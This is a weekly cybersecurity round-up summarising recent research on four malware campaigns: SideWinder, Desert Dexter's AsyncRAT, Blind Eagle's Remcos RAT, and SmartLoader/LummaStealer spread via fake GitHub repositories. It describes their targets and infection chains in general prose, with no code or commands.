Weekly Cyber Round-up

SideWinder APT updates toolset and infrastructure to target maritime and nuclear sectors

Kaspersky researchers observed that the advanced persistent threat (APT) actor group, SideWinder, updated its toolset and created a massive new infrastructure in H2 2024. SideWinder’s targets remain largely the same, though a notable increase in attacks against maritime infrastructures, logistics companies, and nuclear energy entities was observed. Countries targeted with the updated malware include Vietnam, Cambodia, Bangladesh, United Arab Emirates, Djibouti, and Egypt. The infection pattern in the new attacks is consistent with SideWinder’s previous attack chains, though the identified RTF exploit file now contains an updated shellcode to run embedded JavaScript code, which in turn runs mshta to download a malicious HTA from a remote server. The final payloads also remain consistent, but involve new variants of the Backdoor Loader, which is used to sideload StealerBot.

Desert Dexter campaign leverages social media to target MENA region with AsyncRAT

In February 2025, Positive Technologies researchers identified a malicious campaign, active since September 2024, that leverages social media to distribute a modified version of AsyncRAT. The campaign has targeted approximately 900 victims in the Middle East and North Africa (MENA). The attackers behind the campaign create fake news groups on Facebook and publish advertisements containing links to a file-sharing service or Telegram channels impersonating legitimate media companies. A custom reflective loader is used to inject a modified version of AsyncRAT, which uses a modified IdSender module to check for a two-factor authentication extension and various cryptocurrency wallet extensions. The malware also includes an offline keylogger and communicates with a Telegram bot. Based on messages and screenshots sent to the Telegram bot, the campaign has been attributed to a threat actor called Desert Dexter.

Blind Eagle targets Colombian institutions with Remcos RAT and other commodity malware

Check Point researchers observed a series of ongoing campaigns, attributed to the Blind Eagle threat actor, targeting Colombian judicial institutions and government entities since November 2024. The group appears to have expanded its toolkit to include additional commodity malware, such as HeartCrypt. The group’s final payload continues to be Remcos RAT, with its malware hosted on legitimate file-sharing platforms. The campaigns deliver malicious URL files to trigger a WebDAV request that can be used to monitor user-file interactions and download and execute the next-stage payload. The attack method is similar to the exploitation of CVE-2024-43451, but does not expose the NTLMv2 hash. One observed campaign in December 2024 targeted over 1,600 victims, indicating a significant infection rate compared to Blind Eagle’s typical targeted approach.

Fake GitHub repositories used to distribute SmartLoader and LummaStealer

Trend Micro researchers identified an ongoing campaign leveraging fake GitHub repositories to distribute SmartLoader and subsequently, LummaStealer and other malicious payloads. The malware is disseminated via fraudulent GitHub repositories disguised as gaming cheats, cracked software, and cryptocurrency utilities. Once a user is infected, the attackers can steal sensitive information, such as cryptocurrency wallets, two-factor authentication extensions, login credentials, and other personally identifiable information. The researchers noted that the observed campaign overlaps with one observed in October 2024. Both campaigns used Lua scripts to deliver SmartLoader and ultimately Lumma Stealer, and rely on GitHub for dissemination. The October 2024 campaign, however, used GitHub file attachments rather than storing the malicious files in the releases section of the fake repositories.